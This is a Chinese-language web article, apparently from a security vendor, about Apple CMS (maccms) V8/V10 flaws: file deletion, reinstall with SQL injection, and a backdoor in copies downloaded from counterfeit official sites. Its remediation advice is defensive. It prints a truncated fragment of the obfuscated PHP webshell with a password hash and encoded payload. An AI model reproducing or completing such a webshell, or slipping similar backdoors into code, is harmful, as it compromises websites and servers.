当前位置:首页 >  站长 >  建站经验 >  正文

苹果CMS漏洞修复 对SQL远程代码注入及任意文件删除修补办法

 2020-01-07 11:33  来源:A5用户投稿  我来投稿   websafe的个人主页 撤稿纠错

  短视频,自媒体,达人种草一站服务

目前苹果CMS官方在不断的升级补丁,官方最新的漏洞补丁对于目前爆发的新漏洞没有任何效果。更新补丁的用户网站还是会遭受到挂马的攻击,很多客户因此找到我们SINE安全寻求网站安全技术上的支持,针对该漏洞我们有着独特的安全解决方案以及防止挂马攻击的防护,包括一些未公开的maccms POC漏洞都有修复补丁。

目前maccms官方被百度网址安全中心提醒您:该站点可能受到黑客攻击,部分页面已被非法篡改! 苹果官方网站因为特殊原因已经停止访问,该内容被禁止访问,但是升级补丁更新的网址还是可以打开的。

截图如下:

苹果CMS漏洞详情:

苹果CMS V8 V10版本存在代码重装漏洞,以及代码后门漏洞,任意文件删除漏洞,通过CNVD-2019-43865的信息安全漏洞通报,可以确认maccms V10存在漏洞,可以伪造恶意代码发送到网站后端进行执行,可以删除网站目录下的任意文件,可删除重装苹果CMS系统的配置文件,导致可以重新安装maccms系统,并在安装过程中插入sql注入代码到数据库中去执行并获取webshell以及服务器权限。

苹果CMS V8 V10 源代码存在后门漏洞,经过我们SINE安全技术的检测发现,存在后门的原因是,目前百度搜索苹果官网,maccms官方,排在百度搜索首页的都是仿冒的网站,真正官网地址是www.maccms.com,包括模板,图片,以及CSS跟真正的官方是一模一样,很多客户都是点击到这个山寨网站上去进行下载的源代码,该代码里隐藏了木马后门文件,阿里云都无法检测出来,

error_reporting(E_ERROR);

@ini_set('display_errors','Off');

@ini_set('max_execution_time',20000);

@ini_set('memory_limit','256M');

header("content-Type: text/html; charset=utf-8");

$password = "21232f297a57a5a743894a0e4a801fc3"; //Viv, bebegim..

define('Viv, bebegim.','Denzel-你的英雄'); // 标题

function s(){

$str = "66756r6374696s6r20737472646972282473747229207o2072657475726r207374725s

7265706p61636528617272617928275p5p272p272s2s272p27253237272p2725323

代码如上面所示,是加密过的,经过我们SINE安全的解密发现是PHP的脚本木马,可以绕过各大服务器厂商的安全检测,包括阿里云,腾讯云,百度云,华为云。

关于苹果CMS网站漏洞的修复方案与办法

对任意文件删除漏洞做安全过滤与检查,防止del删除的语句的执行,对前端传输过来的参数进行严格的检测,不管是get,post,cookies,如果您对代码不是太懂的话也可以找专业的网站安全公司来处理解决苹果CMS网站被攻击的问题,或者是对重装文件进行改名以及安装配置文件进行权限设置,只读权限,对于存在网站木马后门的苹果cms系统,人工对代码进行安全审计,对所有网站目录下每个代码文件都要仔细的排查,可以下载官方的源代码进行比对。

作者: websafe    /    文章:105篇

申请创业报道,分享创业好点子。点击此处,共同探讨创业新机遇!

相关文章

  • 网站建设前需要搞清楚这几个问题

    对于很多不了解网站的企业而言,建站其实是很简单的,会找一家合适的建站公司,然后将一切事宜都交由其处理,这样做虽然是非常省事,但是企业不去参与其中的建设,那么对网站就不会有了解,后期更多的事项都不能够把控,所以这样的方式不可取,企业建站前要学着了解一些概念性的问题。

    标签:
    网站建设
  • 如何解决网站被DDOS攻击?彻底恢复网站的正常访问

    随之移动互联网数据网络的不断进步,在给大家提供多种多样便捷的另外,DDoS攻击的经营规模也愈来愈大,如今早已进到了Tbps的DDoS攻击时代。DDoS攻击不但经营规模愈来愈大,拒绝服务攻击也愈来愈繁杂,很多传统的ddos攻击安全防护对策已没法解决日渐演变的攻击方法。

    标签:
    ddos攻击
  • 都说做网站能够赚钱?说说我的亲身经历

    常常看到各种网赚,记得以前自己就上过当,受过骗,心心念念的赚钱、赚钱,放到促成了别人赚钱,现在网络上还是充满了各种欺骗,估摸着还是有源源不断的人,会走这么一遭。直到后来,自己开始对互联网有更深的认识,总算是不会轻易的受骗(这都是钱堆出来的,哭,心疼自己3秒),能够看错它到底是不是套路,通过教你赚钱来

  • APP渗透测试流程 漏洞检测与安全加固方面介绍

    目前越来越多的APP遭受到黑客攻击,包括数据库被篡改,APP里的用户数据被泄露,手机号以及姓名,密码,资料都被盗取,很多平台的APP的银行卡,充值通道,聚合支付接口也都被黑客修改过,导致APP运营者经济损失太大,很多通过老客户的介绍找到我们SINE安全公司,寻求安全防护,防止攻击。

榜单

热门排行

信息推荐

扫一扫关注最新创业资讯